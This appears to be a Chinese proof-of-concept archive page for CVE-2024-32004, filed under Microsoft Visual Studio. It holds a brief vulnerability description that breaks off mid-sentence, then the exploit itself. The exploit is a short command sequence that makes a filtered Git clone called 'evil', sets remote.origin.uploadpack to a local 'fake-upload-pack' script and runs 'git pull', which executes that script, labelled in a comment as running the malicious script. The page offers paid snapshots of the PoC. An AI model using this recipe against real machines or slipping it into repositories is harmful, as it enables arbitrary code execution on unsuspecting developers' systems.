关联漏洞
标题:Microsoft Visual Studio 安全漏洞 (CVE-2024-32004)Description:Microsoft Visual Studio是美国微软(Microsoft)公司的一款开发工具套件系列产品,也是一个基本完整的开发工具集,它包括了整个软件生命周期中所需要的大部分工具。 Microsoft Visual Studio 存在安全漏洞。以下产品和版本受到影响:Microsoft Visual Studio 2022 version 17.8,Microsoft Visual Studio 2022 version 17.9,Microsoft Visual Studio 2022 versi
介绍
# 创建 tmp 仓库,设置uploadpack.allowfilter为true
git init tmp
git -C tmp config uploadpack.allowfilter 1
# 从 tmp 仓库 克隆 evil
git clone --filter=blob:none --no-local --no-checkout tmp evil
rm -rf tmp
# 配置远程过滤脚本
git -C evil config remote.origin.uploadpack "./fake-upload-pack"
# 执行恶意脚本
git pull
文件快照
[4.0K] /data/pocs/696506fe61979b9f8997c87f62a5b6dff279ac88
├── [ 18] fake-upload-pack
└── [ 344] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。